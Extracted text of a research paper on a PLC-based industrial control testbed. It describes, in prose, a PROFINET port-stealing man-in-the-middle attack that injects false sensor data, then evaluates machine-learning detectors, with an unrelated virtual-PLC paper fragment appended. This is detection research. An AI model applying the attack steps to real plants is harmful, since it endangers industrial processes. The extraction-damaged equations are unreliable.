memory that can be accessed FIGURE 2. The TE process block diagram. through a web-server. In other words, the web-server provides a local cloud that allows the user access and control over the PLC internal memory, stop/run PLC and many other features remotely (through the PLC static IP address). In the devel- oped testbed as shown in Fig 2, by using the Siemens internal communication protocol known as the S7 communication, all measurements and actuator data of each PLC are transferred to and are stored in the PLC 6 internal memory. Subsequently, these data can be downloaded from the web-server for train- ing or for online cyber attack detection purposes as will be presented and described in Section V. D. VULNERABILITIES AND CYBER ATTACK GATEWAYS AND POINTS Figure 2 illustrates the cyber attack gateways and points on the testbed where the malicious hackers can gain access to the communication link between the PLC and I/O modules. By accessing each communication link, the malicious hack- ers can inject different cyber attacks on the sensor mea- surements as well as actuator commands corresponding to that communication link. For example, as shown in Fig. 2 and Table 4, if the hacker accesses the communication link between the PLC1 and the I/O module 1 (labeled as commu- nication link #1), then the sensor measurements XMEASs 2, 3, 17 and 40 and the actuator commands XMVs 1 and 2 can be compromised. III. COMMUNICATION PROTOCOLS A. PROFINET Siemens S7-1200 utilizes the PROFINET protocol suite as an industrial Ethernet standard and S7-communication pro- tocol in order to communicate with other network nodes. PROFINET protocol is the standard protocol which is being facilitated heavily by Siemens as one of the main indus- trial Ethernet communication protocols. It has inherited its architecture from the native OSI model of TCP/IP for cyclic and acyclic data and UDP/IP for context manage- ment. A PROFINET architecture/system requires at least three nodes to operate, namely: the IO Controller (PLC), the IO Module (Sensor and Actuator), and the IO Supervisor VOLUME 9, 2021 16243 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed (Engineering Station or HMI Device). Moreover, PROFINET inherits variety of Information Technology protocols within its substructure to establish and maintain connectivity, which is susceptible to similar structure cyber attack surfaces that are present in the standard Ethernet environments. One of the main characteristics of the PROFINET protocol suite that distinguishes itself from the other ICS protocols is that it prioritizes the type of communication based on real-time requirements. Consequently, as shown in Fig. 3, two channels are being introduced as Real-Time (RT) and Non- Real-Time (NRT) and both channels coexist in the Appli- cation Relation (AR) between the IO Device and the IO Controller. An Application Relation is a state which both the IO Device and the IO Controller need to converge to, in order to initialize the transmission of the Cyclic Data. However, a handshake is a perquisite to this state which is being conducted by the pro net Context-Manger (PN-CM). FIGURE 3. PROFINET IO RT and the NRT Stack18. In terms of the C.I.A security aspects (con dentiality, integrity and availability) of the PROFINET protocol, it is shown in this work that to compromise con dentiality of the cyclic data, through an Address Resolution Protocol (ARP)- compromising attack a hacker can read the data in the plain text; to compromise integrity, the hacker can inject false data through the network switch; and to compromise availability, a port stealing attack would make the service temporarily unavailable. B. PROFINET IO REAL-TIME PROTOCOL STRUCTURE In order to guarantee real-time synchronicity in data trans- mission, certain layers of the OSI model have been omitted in PROFINET IO (PNIO) as illustrated in Fig. 3, which results in lower overhead communication ows. Hence, as shown in Fig. 4, in the real-time structure the dissection of a frame only consists of the Ethernet Header and the PROFINET Application Layer and which is speci ed as follows: a) Frame-ID: Indicates the type of the frame which is set as 8; 000 for cyclic real-time data. b) IO Data: Sensor measurements and actuator signals are referred to as IO Data. c) IO Data's Status: Represents the status of a given vari- able in the frame. 18Courtesy of pro netuniversity.com FIGURE 4. PROFITNET IO real-time packet structure. d) Cycle Counter: An incremental value, which is being incremented from the source, with an error checking purpose. e) Data Status: Indicates the validity of the entire packet. In the IO module, the data cycle update time, which is denoted by dt, can be set based on the system require- ments from 2 to 512 msec, which represents the rate of data exchange between the IO module and the PLC. In the developed testbed, given the slow behavior of the TE pro- cess, this value is set to dtD512 msec, which implies that 4 data samples are communicated in each full cycle (2 seconds). Fig. 5 shows the cycle counter corresponding to dtD512 msec. FIGURE 5. Cycle counters corresponding to dtD512 msec. IV. CYBER ATTACK INJECTION In this section, our methodology for injecting cyber attacks on the developed testbed is presented. Generally, differ- ent protocols enable various attack surfaces such as the Data Integrity (DI) attack (e.g. manipulating sensor mea- surements), and Denial-of-Service (DoS) which causes dis- ruption of communication ow among entities. In an ICS architecture, cyber attacks can be categorized into two gen- eral types, namely as con guration and operational attacks. In the con guration attack, the malicious hacker targets the con guration protocols of the ICS, and consequently gets access to full control of the system. On the other hand, in the operational attacks, the malicious hacker mainly targets the operational communication protocol such as the PROFINET IO Real-time data, in which critical eld data are transferred. For this cyber attack to take place, it is assumed thatV (i) The hacker has a eld level access to the IO Module and PLCs. 16244 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed (ii) Hacker has knowledge of the physical system, implying that, he/she is aware of what is being transmitted from the sensors and what are being transferred to actuators. In [34], the authors exploit a vulnerability of the PROFINET Discovery and Basic Con guration Proto- col (DCP) to inject DoS attacks through port stealing, against the application relation between the IO Controller and the IO Device. This type of cyber attack is not designed to be stealthy and has a higher probability of detection. An early attempt for false data injection through port stealing is presented in [35] although the developed attacks are notimplemented on a real testbed. In this paper, based on the structure and features of the PROFINET, a false data attack is injected into the PROFINET IO. Real-time data through the man-in-the-middle (MITM) structure is also validated on the developed testbed. This is mainly achieved by utilizing the ARP in which the port of the victim on the shared medium (such as a switch) is stolen and the hacker acts as a Man-in-the-Middle (MITM) in the closed-loop system that can modify the sensor measurements that are sent to the PLC. The PROFINET IO devices do not have any endpoint secu- rity functionality [36] which allows cyber attacks feasible once a malicious hacker has a physical access to a device or its network connections. One of the most effective and damaging cyber attacks on the PROFINET IO devices is the MITM cyber attack. The MITM cyber attack will be implemented in our devel- oped testbed, by utilizing the Port Stealing methodology. In the Port Stealing attack, the switch MAC table is compro- mised such that the hacker's MAC address is registered in place of the victim. Therefore, the intended port from the I/O module is stolen by the hacker, and consequently he/she can transmit false data to the PLCs. Port Stealing is an active cyber attack which allows a hacker to sniff packets in a switched network as well as mod- ify packets by injecting new packets. This cyber attack targets the Application Relationship between the IO Controllers and the IO devices. Successful Port Stealing requires the hacker to synchronize with the real-time data communication and establish a race condition. The complete Port Stealing strat- egy is developed as follows: ARP Flooding: First, an ARP packet is constructed by setting the packet destination and source MAC address to the hacker MAC and the victim MAC, respectively. Subsequently, by injecting high ow rates of ARP pack- ets into the switch, the intended port victim is stolen. As shown in Figs. 6and victim 7, the MAC table of the switch is modi ed after the ARP ooding and the MAC address of the hacker is set as the MAC address of the IO module in the MAC address table. Receiving Data: In this step, the hacker receives data from the victim and modi es the sensor readings accord- ing to his/her knowledge of the process. The data received by the hacker is the raw IO data from the PROFITNET IO real-time packet as depicted in Fig. 4. FIGURE 6. Data exchange configuration before the ARP flooding. FIGURE 7. Data exchange configuration after the ARP flooding. Next, the hacker needs to map the raw IO data into an actual sensor reading in order to be able to modify it precisely so that it will result in a desired effect to the system. Here the assumption is that the hacker has knowledge of the physical process and the control system, and therefore can map the raw IO data to the actual sensor readings. Therefore, the hacker will be able to choose values that are not easily detectable by the operator, thus a stealth cyber attack will be realized and accomplished. Forwarding the Manipulated Data: In this step, the main MITM cyber attack is implemented whereby the hacker re-crafts the received frames and forwards the modi ed frames back to the victim. However, the received frames cannot only be forwarded back to the network due to existence of the cycle counter in the frame. There exists a threshold for the number of missing packets per cycle and its value can be set inside the TIA portal tool. Therefore, in order to overcome this issue, the re-crafted packets are sent in a full cycle. Moreover, as the hacker and the IO modules are simul- taneously sending the data to the PLC, a race condition is established between them in which the behavior of the system depends on the sequence or timing of events. With respect to Fig. 5, the race condition occurs if the hacker can send false data between the state tran- sitions, therefore the false data crafted by the hacker would arrive at the victim before the actual data. The signi cance of the hacker to win the race condition is that the hacker is capable of injecting false measurement data to the system. However, this injection has to be VOLUME 9, 2021 16245 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed sustained, at ideally every, or practically at most state transitions, for the hacker to be successful in winning the race condition. After winning the race condition, the hacker can receive the RTC1 frames which contain IO Data variables (process data). In order to increase the success probability of the cyber attack, the PLC should continually receive the mal-crafted data rather than the original data, therefore the hacker should send each mal-crafted data for more than one cycle. Fig. 8 depicts the entire process of implementing the false data injection cyber attack on the PROFINET. It should be noted that due to precise timing and synchronicity which are required in order to inject data into the PLC, we have used the C language and libpcap put reference library in order to make this methodology possible. The libpcap library works by capturing all the frames that are coming out of the physical medium into the data link layer. The alternative to using libpcap library is to use a packet capture software such as the Wireshark, however for our purposes this is not suitable since Wireshark captures and saves packets of ine. FIGURE 8. False Data Injection (FDI) through the port stealing. One important point regarding the implemented cyber attack is that if the hacker continues the port stealing for a long duration, this will disrupt the communication between the PLC and the IO. In this case, the attack becomes a Denial- of-Service (DoS) attack which can be easier to detect by operators. By stopping the port stealing step after a given time duration, such as 1 sec, the attacker is able to start the frame manipulation without disrupting the communication. V. CYBER ATTACK DETECTION (CAD) SCHEME In order to detect cyber attacks in our developed testbed, sev- eral machine learning-based detection strategies are proposed and implemented. As shown in Fig. 9, the cyber detection scheme is divided into three main steps, namely, (a) pre- processing, (b) main scheme, and (c) post-processing.A. PRE-PROCESSING In order to have a dataset with zero mean and unit variance (standardization), data normalization is performed. The key feature of data normalization is that it will boost the learning speed and optimizes the algorithm accordingly. Moreover, there are several available techniques for data normalization, based on the nature/requirement of the algorithms itself. B. MAIN SCHEMES Broadly speaking, anomaly detection schemes can be divided into ve main categories, namely (1) linear, (2) proximity- based, (3) probabilistic, (4) outlier ensembles, and (5) neural networks [7]. Consequently, in order to provide a comprehen- sive comparative study and evaluation the following schemes are chosen belonging to different categories: Linear: Principal Component Analysis (PCA) and One-Class Support Vector Machines (OCSVM). Proximity-Based: Local Outlier Factor (LOF) and k-Nearest-Neighbors (kNN). Outlier Ensembles: Isolation Forest (IF). 1) PRINCIPAL COMPONENT ANALYSIS (PCA) Principal Component Analysis (PCA) [37] is a method widely used to determine dominant subspaces in datasets based on eigenvectors of the covariance matrix that is des- ignated as the principle components. An anomaly detection technique can be developed based on variations from the nominal dominant subspaces in the dataset. Generally, the use of major components indicates global deviations from the majority of results, whereas the use of minor components may suggest smaller local deviations. Indeed, as illustrated in Algorithm 1, by performing the Singular Value Decom- position (SVD) over the normalized data, the eigenvalues and eigenvectors can be determined. Moreover, by computing the PCA-reconstructed representation from OXDXTTT, the approximated value ( OX) can be obtained. Therefore, by computing the maximum Euclidean distance between the normalized training data and the approximated one in the training set, threshold values can be determined. Conse- quently, for the testing data point (D), if the distance between the existing instance and the corresponding approximated value of that instance is above a given threshold value, then the instance can be considered and classi ed as a cyber attack. 2) ONE-CLASS SUPPORT VECTOR MACHINES (OCSVM) In the one-class support vector machine as a semi-supervised anomaly detection approach, the aim is to determine a hyper- sphere in the feature space with the minimum radius that contains all or most of the data points corresponding to the healthy operation of the system [38]. The hypersphere has two main parameters, namely the radius RTand its center awhich are obtained by solving an optimization problem as explained in Algorithm 2. Once, these parameters are obtained through the training stage, for each test data point D, one can obtain the distance between the data point and the hypersphere center aand if this distance is greater than RT, 16246 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed FIGURE 9. The proposed data-driven cyber attack detection methodology where r(t) denotes the decision flag corresponding to the real-time data point x(t). Algorithm 1 Principle Component Analysis (PCA) Training: Input: X- Training data, p- number of components to keep for PCA transformation. Output: Threshold Tr 1:Calculate SVD of the training data (X ) 2:Construct the transformation matrix Tby selecting the p dominant eigenvectors 3:Calculate the PCA-reconstructed representation, OXD XTTT 4:Find the Euclidean distance between OXandX,ED distance(OX;X) 5:Set the threshold as TrDmax(E ) Testing: Input: D- test data, Tr. Output: Test data ag r 1:Calculate the PCA-reconstructed representation of the testing data,ODDDTTT 2:Calculate the Euclidean distance between ODandD,eD distance(OD;D) 3:ife<Trthen 4: Dis normal, rD1. 5:else 6: Dis abnormal, rD0. 7:end then the point is classi ed as an anomaly, otherwise it is assigned as a healthy data. The only two hyper-parameters for the OCSVM are Cand, where Cis controlling the in uence of slack variables in the optimization process, and can be obtained from CD1 N, whererepresents the trade-off between the over tting and the generalization accuracy, and is the kernel coef cient. 3)k-NEAREST-NEIGHBORS (kNN) Thek-nearest-neighbor global unsupervised anomaly detec- tion scheme is a simple way to determine irregularities for not to be mistaken with the kNN classi cation scheme [39].Algorithm 2 One-Class Support Vector Machine (OCSVM) Algorithm Training: Input: xi- training data (i2f1; 2;3;:::; Ng),C. Output: The hypersphere centre aand its radius RT. Optimize i,iD1;:::; Nin minL( )DNX i;jD1 i jK(xi;xj) NX i;jD1 iK(xi;xi) subject to 0< i<CandPN iD1 iD1 where K(xi;xj)D exp( jj(x i xj)jj2 2 ). Compute the centre (a) and the radius (R T) of the hyper- sphere from: aDPN iD1 ixiand R2 TDmax kK(xk;xk) 2NX iD1 iK(xk;xi) CNX i;jD1 i jK(xi;xj) Testing: Input: D- test data, the hypersphere centre aand its radius RT. Output: Test data ag r Compute R(D)DK(D;D) 2NP iD1 iK(D;xi)CNP i;jD1 i jK(xi;xj) ifR(D)>RTthen Dis abnormal, rD1. else Dis normal, rD0. end As the name suggests, it specializes on global anomalies and is unable to identify local anomalies. In this approach, the hyper-parameter kdenote the number of nearest neighbors. VOLUME 9, 2021 16247 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed During the training phase, the decision score ascore corre- sponding to all the training points are computed as the Largest distance to their knearest neighbors [40] using the Ball-tree algorithm. The maximum value of ascorecorresponding to the training data is set as the threshold Tr. Then, as illustrated in Algorithm 3, for each test data point D, the decision score ascore(D) is compared with the computed threshold to detect a cyber attack. Algorithm 3 Nearest-Neighbor Algorithm Training: Input: xi- training data (i2f1; 2;3;:::; Ng),k, Output: Threshold Tr 1:foriD1;:::; Ndo 2: Compute the knearest neighbors of xiusing the Ball-tree algorithm. 3: Compute the decision score (a score(xi)) as the largest distance between xiand its nearest neighbors. 4:end 5:Set threshold as TrDmax i(ascore(xi)) Testing: Input: D- test data, xi- training data, Tr, Output: Test data ag r 1:Compute the knearest neighbors of Dusing the Ball-tree algorithm. 2:Compute the decision score (a score(D)) as the largest distance between Dand its nearest neighbors. 3:ifascore(D)>Trthen 4: Dis abnormal, rD1. 5:else 6: Dis normal, rD0. 7:end 4) LOCAL OUTLIER FACTOR (LOF) The local outlier factor (LOF) approach [41] is the most well-known local anomaly detection algorithm. In this algo- rithm, the concept of local anomalies is utilized where the LOF score is determined by matching the Local Reachability Density (LRD) of the record with respect to the LRDs of itsk-nearest neighbors as illustrated in Algorithm 4. In this approach, rst for the test data point Dand the training set X, thek-distance Dk(D) is de ned as Dk(D)Dd(D;x),x2X, where (a) there exist at least kdata points x02Xsuch thatd(D;x)d(D;x0), and (b) there exist at most k 1 data points x02Xsuch that d(D;x)<d(D;x0), with d(D;x) denoting the distance between the point Dandxthat can be found by using different norms. Next, the k-distance neighborhood Nk(D) is de ned as follows Nk(D)Dfx2Xjd(D;x)Dk(D)g: It should be noted that the cardinality of Nk(D) that is denoted byjNk(D)jcan be generally greater than k. Then, the reach- ability distance of Dwith respect to x2Xis de ned as Rk(D;x)Dmaxfd (D;x);Dk(x)g:Algorithm 4 Local Outlier Factor (LOF) Algorithm Input: xi- training data, k,D- testing data Output: Test data ag r 1:Find the k-distance neighborhood Nk(D) 2:Compute the Local Reachability Density (LRD); LRD(D)DjNk(D)jP x2N k(D)Rk(D;x) 3:Compute LOF(D)DP x2Nk(D)LRD(x ) LRD(D)jN k(D)j 4:ifLOF(D)>threshold then 5: Dis abnormal, rD1. 6:else 7: Dis normal, rD0. 8:end Next, the Local Reachability Density LRD(D) and the Local Outiler Factor LOF(D) are obtained as explained in Algorithm 4. Finally, the test data point is classi ed as abnor- mal if LOF(D)>1. 5) ISOLATION FOREST (IF) The Isolation Forest (IF) scheme which is an unsupervised machine learning technique [42], [43] is now used as the strat- egy for performing the cyber attack detection objective. The key advantage of IF with respect to other anomaly detection schemes are as follows: (I) IF scheme does not utilize any distance or density measure to detect an anomaly, which elim- inates a major computational cost of distance computations, and (II) it has a linear time-complexity with a constant train- ing time and a minimal memory requirement [44]. These are two key features that are essential for online implementation of the IF for a real-time cyber attack detection process in industrial control systems. Cyber attack detection using the IF is performed in two stages, namely: (1) training, and (2) real-time testing. In the training phase, isolation trees are constructed by using the sub-samples of the normal healthy system operational dataset. In the online testing phase, the real-time data are fed to the trained IF for performing the cyber attack detection objective. In the training phase, given the training set XD fx1;:::; xNg,xi2Rdcorresponding to the normal operation of the system, mdifferent isolation trees Ti,iD1;:::; mare constructed by recursively splitting a sub-sample XiX until all the data points in Xiare isolated. For each isola- tion tree Ti, the sub-sample Xiis randomly selected without replacement from Xusing two hyper-parameters, nas the number of data-point used to train each tree, and fd as the number of features that are selected for training that isolation forest, i.e. XiDfx i;1;:::; xi;ng,xi;j2Rf. Each tree is speci ed by a set of nodes that are indexed by the pair (j; k), where jdenotes the depth of the node and kis the index of that node in the given depth, where 0 k2j 1. Each internal 16248 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed node (j; k) has two children (jC1;2k) and (jC1;2kC1) and the root node is denoted by (0; 0). The isolation forest as shown in Algorithm 5is operating based on the concept of binary recursively splitting the feature spaceRdby each isolation tree Tias well as with randomly selecting a split feature q2f1;:::; fgand its split value p within the selected feature range. The scheme will be initiated with the root node (0; 0) and the training set Xiand the train- ing set for each node, denoted by Xj;k iis obtained recursively as follows. At the node (j; k), the data-points are splitted into two subsets XjC1;2k iDfx i;j2Xj;k i;jD1;:::; njxq i;j<pg andXjC1;2kC1 iDfx i;j2Xj;k i;jD1;:::; njxq i;jpg, until all samples are isolated, where xq i;jcorresponds to the qth element ofxi;j. In each splitting step at node (j; k), two children nodes (jC1;2k) and (jC1;2kC1) with the corresponding training datasets XjC1;2k iandXjC1;2kC1 iare generated. These can be an internal node if it is still possible to split the corresponding subset or an external node corresponding to the last node in the branch when the size of the data subset of that region is 1, or the maximum tree depth is reached. In case of an internal node, the data subsets XjC1;2k iandXjC1;2kC1 iare further splitted until an external node is reached. Algorithm 5 TrainTi.Xi/ Input: Xi- input data Output: anTi 1:Initialization: The root node with index (0; 0) and the training set X0;0 iDXi. Set jDkD0. 2:ifXj;k icannot be divided then 3: The node (j; k) is designated as the external node and no division will be performed for this node. 4:else 5: The node (j; k) is designated as the internal node 6: Randomly select a feature q2f1;:::; fg 7: Randomly select a splitting value pbetween the mini- mum and the maximum values of the feature qinXj;k 8: SetXjC1;2k iDfx i;j2Xj;k i;jD1;:::; njxq i;j<pg 9: SetXjC1;2kC1 iDfx i;j2Xj;k i;jD1;:::; njxq i;jpg 10: Recursion: Go to step 2 and continue splitting the nodes (jC1;2k) and (jC1;2kC1) 11:end The general concept for the cyber attack detection strategy by utilizing the IF is justi ed and rationalized by the fact that in the process of splitting data, the cyber attacks are different from the normal points and they can be isolated closer to the root of the tree. Consequently, they have a shorter path from the root. In the real-time cyber attack detection process, for each new sample measurement D, the path length in the ith tree Ti, as denoted by hi(D), is obtained by counting the number of edges from the root node to an external node as the sample Dis splitted through the isolation tree Ti. Consequently, the average path length of all trees is obtainedas followsV havg(D)D1 mmX iD1hi(D); (1) Next, a score value is assigned to the new sample measure- ment Das s(D)D2 havg(D) H; (2) where Hdenotes the average expected path length of the trees in the forest and is given by HD2 ln(n 1)C1:2 2(n 1)=N; (3) with Ndenoting as the total number of data-points in X. Finally, the cyber attack is detected by using the detection thresholdas followsV rD( 0 if s(D)> 1 if s(D):(4) C. POST-PROCESSING As illustrated in Fig. 9, in the post-processing stage, an obser- vation window of the last Wdata-points is used to perform the cyber attack detection decision making process. Specially, if 80% (80% is chosen based on the mesh search) of W ags r( ), 2[t W;t] corresponding to the the last Wdata points x(t) are isolated as anomaly by the anomaly detection scheme, then the current data-point x(t) is identi ed as a cyber attack. The main goal of the window-based post- processing scheme is to reduce the number of false alarms and to produce a smoother decision making process. VI. PERFORMANCE EVALUATION AND ASSESSMENT In this section, evaluation and validation of our proposed cyber attack detection schemes are provided and demon- strated for the developed TE testbed infrastructure. A. DATASET As previously indicated, the proposed methodologies of this work are demonstrated by using the real datasets that are generated from the implemented ICS testbed. The gener- ated dataset consists of 25 variables such that 16 variables are corresponding to the sensor measurements and 9 vari- ables are corresponding to the actuator signals. Two types of datasets are generated, where initially the testbed was run for almost 72 hours under the normal condition (that is, cyber attack free) for generating the training set of the size (2596827) (after removing the initial transient behavior), i.e.ND96827. Subsequently, the testbed was run several times subject to different cyber attack scenarios and different cyber attack gateways and points. Towards this end, false data injection (FDI) cyber attacks are injected in the communication channels between the I/O modules and the corresponding PLC through online scaling the sensor measurement data with the scaling factor . Four different cyber attack scaling scenarios are considered as VOLUME 9, 2021 16249 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed 2f0:98; 0:96; 0:94; 0:92g, with the cyber attack duration of two hours. For instance, PLC 3 receives four measurements, namely, y12,y14,y15, and y17and the cyber attack on PLC 3 can be modeled asV yiaDyi; iD12;14;15;17 (5) where yiacorresponds to the i-th measurement under cyber attack. Figure 10 illustrates the FDI on y12andy15in PLC 3 for all the four scaling cyber attack scenarios. These four cyber attack scenarios are repeated for all the ve PLCs, and hence 20 different cyber attack scenarios are injected. Consequently, the test dataset with the size of (25 128159) has been generated such that 68113 out of 128159 correspond to cyber attacks and the rest are healthy data. The sampling time for data logging was 2 seconds for both datasets. FIGURE 10. Measurements under cyber attacks for PLC3. B. TRAINING OF PROPOSED METHODOLOGIES The training of the proposed schemes and structures are performed by using an open-source Machine Learning library for the Python programming language, which is known as the Scikit-learn library and PyOD toolbox [7], [45]. Furthermore, the training is performed by using an 8-fold cross-validation such that each structure is trained 8 times. Moreover, the hyper-parameters of each scheme are set based on the mesh-search around the recommended values in PyOD [7]. C. PERFORMANCE EVALUATION METRICS The confusion matrix is a form of contingency table with two dimensions identi ed as True and Predicted, and a set of classes corresponding to both dimensions, as presented in Table 5. The following detection and classi cation perfor- mance metrics are derived from the confusion matrix [46] as follows: TABLE 5. The confusion matrix. 1) ACCURACY Accuracy speci es the closeness of measurements to a spe- ci c category/class and it is computed asV AccuracyDTPCTN TPCFPCTNCFN(6)2) RECALL Recall is the True Positive Rate (TPR) and is computed asV TPRDTP TPCFN(7) 3) PRECISION Precision is the Positive Predictive Value (PPV) and is com- puted asV PPVDTP TPCFP(8) 4) F1 SCORE F1 Score is the harmonic average of the precision and recall, where it is at its best at a value of 1, implying perfect precision and recall and is computed byV F1D2PPVTPR PPVCTPR(9) It should be noted that the main aim of this section is to perform a quantitative comparison study of various cyber attack detection schemes is presented using the real-time data generated by the developed testbed. D. COMPARATIVE TESTING AND VALIDATION RESULTS In this subsection, a quantitative comparison study of various cyber attack detection schemes is presented. As previously indicated, the eld data are collected in real-time from the PLC's local cloud. Therefore, by implementing the cyber attack detection schemes on the process data in real time, the status of the data can be determined online. Table 6 provides the ef ciency of the proposed schemes. As illustrated is Table 6, the IF has the worst performance over the provided datasets due to high oscillation in the detection signal (high number of false negative alarms), while it has the fastest training time (speed) in comparison with the other techniques. Moreover, the OCSVM scheme has achieved quite promising results as compared to other meth- ods. In general, the training speed is directly proportional to the characteristics of the scheme. For instance, the IF infrastructure is based on combination of multiple decision trees (binary) which leads to having a considerably fast train- ing speed. On the other hand, OCSVM scheme calculates the decision boundaries about the data points, and hence its training speed is slow. Table 7shows the cyber attack detection time (DT) corresponding to various cyber attack scenarios. Overall, as expected from Table 6, the OCSVM and kNN have the fastest detection times and by increasing the cyber attack severity (), the cyber attack detection times are generally improved. However, for the IF algorithm, due TABLE 6. Performance of the proposed schemes. 16250 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed TABLE 7. The cyber attack detection time (DT). FIGURE 11. Cyber attack detection of the PLC3. to high oscillations in the original signal and effects of post processing algorithm, by increasing the detection times are not improved. Figures 11 and 12depict the performance of various cyber attack detection schemes for the scenarios of PLC3 and PLC5, respectively, where the ag ``0'' represents the healthy data and the ag ``1'' represents the cyber attack data. The scaling factors in these gures are D0:98; 0:96; 0:94 and D0:92, respectively. It should be noted that PLC 5 is the least sensitive one in terms of cyber attack detection due to low number of direct measurements as provided in Table 4. As shown in Figure 12, this fact leads to false negative alarms generation using IF while the other algorithms can still detect the attacks on PLC 5 without any false negative alarm. FIGURE 12. Cyber attack detection of the PLC5. E. THE COMPUTATIONAL COMPLEXITY The computational complexity analysis of machine learn- ing algorithms can be generally performed by computing theO-notion of each algorithm, which, represents the rate of the growth or the decline of the algorithm computa- tional complexity. In case of the nearest-neighbor based algorithms, the computational complexity of identifying the nearest-neighbors is O(N2) (where Nis the number of sam- ples) and the remaining computations, such as density or the LOF computations, can be ignored in the operations (less than 1% of the runtime). The complexity of the single-class SVM-based scheme is dif cult to compute since it depends on the number of support vectors and therefore on the data properties and characteristics of the results. Furthermore, thetuning of the SVMs that are used has a signi cant effect on the runtime as the computations have quadratic com- plexity. Nevertheless, the complexity of the OCSVM scheme can be scaled between O(dN2) toO(dN3), where ddenotes the number of features. The computational complexity of the PCA scheme is O(d2NCd3), and thus it relies strongly on the number of measurements. If the number of dimensions is low, the scheme in practice represent as among the fastest algorithms in our studies. Finally, the complexity of the IF scheme can be obtained to be O(tNlogN ), where tdenotes the number of trees [42]. VII. DISCUSSION AND CONCLUSION In this paper, a hybrid testbed is developed and implemented for an industrial control system (ICS) through real-time sim- ulating the Tennessee Eastman (TE) process as the physi- cal component of the testbed and implementing the other layers of the ICS using Siemens modules, such as PLC and distributed I/O. Due to various security aspects of ICS, there are many constraints and challenges in obtaining actual VOLUME 9, 2021 16251 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed eld data. Therefore, by generating and logging the data from the physical part of the proposed testbed, a dataset as close as possible to the real eld data is generated. Accord- ingly, by using this dataset, the impact of various real-time cyber attacks on the system and the corresponding proposed online detection approaches are studied. The Man-In-The- Middle (MITM) cyber attacks are directly implemented on the PROFINET communication protocols such that the mali- cious hacker can modify the sensor measurements that are sent to the PLC. Subsequently, several cyber attack detection approaches have been developed and implemented in real- time. Table 6 shows the overall performance of each cyber attack detection methodology under various malicious attack scenarios. Furthermore, Table 7 provides the cyber attack detection time for each scheme. Although, all the evaluated schemes have been able to detect the cyber attacks before shut-downing of the plant, however, the OCSVM scheme shows the best performance for this particular application. This study that is based on the proposed testbed can aid in determining the optimum approach for a particular ICS process that is based on speci ed constraints (e.g. the plant shutdown condition) and requirements (e.g. the plant produc- tion rate). It should be emphasized that none of the previous works in the literature have considered the full Tennessee Eastman process in their developed testbed. Also, to the best of the authors' knowledge, none of the previous work have worked on the PROFINET protocol for injecting real-time cyber attacks. Moreover, in most of the previous work, the cyber attack detection algorithms are implemented off-line after collecting the data from the testbed where as in this work, the cyber attack detection schemes are implemented all in real-time in the supervisory level of the testbed. Hence, in this work the online performance for our proposed cyber attack detection schemes are demonstrated and provided. Future work will involve the implementation of more com- plex multi-point cyber attacks on the testbed and evaluation of the performance of cyber attack detection and mitigation schemes in real-time on the testbed. ACKNOWLEDGMENT The statements made herein are solely the responsibility of the authors.
Summary:
Due to recent increase in deployment of Cyber-Physical Industrial Control Systems in different critical infrastructures, addressing cyber-security challenges of these systems is vital for assuring their reliability and secure operation in presence of malicious cyber attacks. Towards this end, developing a testbed to generate real-time data-sets for critical infrastructure that would be utilized for validation of real-time attack detection algorithms are indeed highly needed. This paper investigates and proposes the design and implementation of a cyber-physical industrial control system testbed where the Tennessee Eastman process is simulated in real-time on a PC and the closed-loop controllers are implemented on the Siemens PLCs. False data injection cyber attacks are injected to the developed testbed through the man-in-the-middle structure where the malicious hackers can in real-time modify the sensor measurements that are sent to the PLCs. Furthermore, various cyber attack detection algorithms are developed and implemented in real-time on the testbed and their performance and capabilities are compared and evaluated.
|
Summarize:
Index Terms RDMA, vPLC, state synchronization I. I NTRODUCTION The advantages of cloud deployments, e.g., resource elastic- ity, simplified setup and management, and pre-build services for rapid deployments, are well known in the IT sector and therefore a stable tool in most companies [1]. On the other hand, the automation and process industry have been reluctant to these advances so far while the need for computing at the factory edge is rising constantly. New use cases and advances in technology, e.g., condition monitoring, big data and computer vision, require more hardware resources than established shop floor IT systems. These use cases are usually realized through hardware appliances directly deployed at the processes. Unfortunately, this brings a higher complexity into the shop floor, resulting in more down time due to more possible points of failure and bigger attack surfaces for IT security threats. Moreover, the roll-out and patch manage- ment of these distributed devices can get very complicated and difficult, especially with only small patch windows in automated processes. Therefore, the concept of edge clouds is gaining more and more attention in these environments. However, a simpledownsizing and migration from architectures deployed in big data centers to the edge is not sufficient. Different require- ments in terms of real-time (RT), reliability and resiliency are present in the automation domain, which require new solutions that are not yet available in state-of-the-art cloud environments. A use case in this field of applications is the virtualization of Programmable Logic Controllers (PLCs). PLCs are used in the automation and process industry for control functions and orchestration of processes. Depending on the area of application, the necessary failover time to keep a process running without interruption can be as low as single digit milliseconds. The complexity of systems inside the automation domain has to stay relatively low to allow for fault tolerant systems with quick debugging possibilities and manageability. Moreover, the state-of-the-art control architecture is currently distributed on the shop floor, with PLCs in the field controlling their respective devices. A single hardware fault results in only a single system, i.e., a robot cell, to stop working, provided that there is no redundant controller in place to take over. Centralizing multiple PLCs into a cloud infrastructure results in multiple control applications running on one physical host. Here, a single hardware fault has a bigger blast radius and would result in the stop of a multiple of virtualized PLCs (vPLCs) and hence a high number of systems in the field, which in turn leads to significantly higher risks and costs following a hardware failure. This scenario illustrates the need for high availability (HA) solutions to benefit from the strengths of cloud infrastructures whilst avoiding single points of failure. This could also be one of the reasons we have not seen major deployments of vPLCs, despite their many advantages and research advances in the past [2], [3]. The main contribution of this paper is therefore to provide a first concept for HA of stateful applications with hard RT requirements that is directly applicable for lift-and-shift scenarios of currently hardware-bound applications. The novel paradigm shift directly increases flexibility and scalability of stateful applications and creates a disruption in businesses like the automation industry, where the selling of hardware-bound2023 IEEE 21st International Conference on Industrial Informatics (INDIN) | 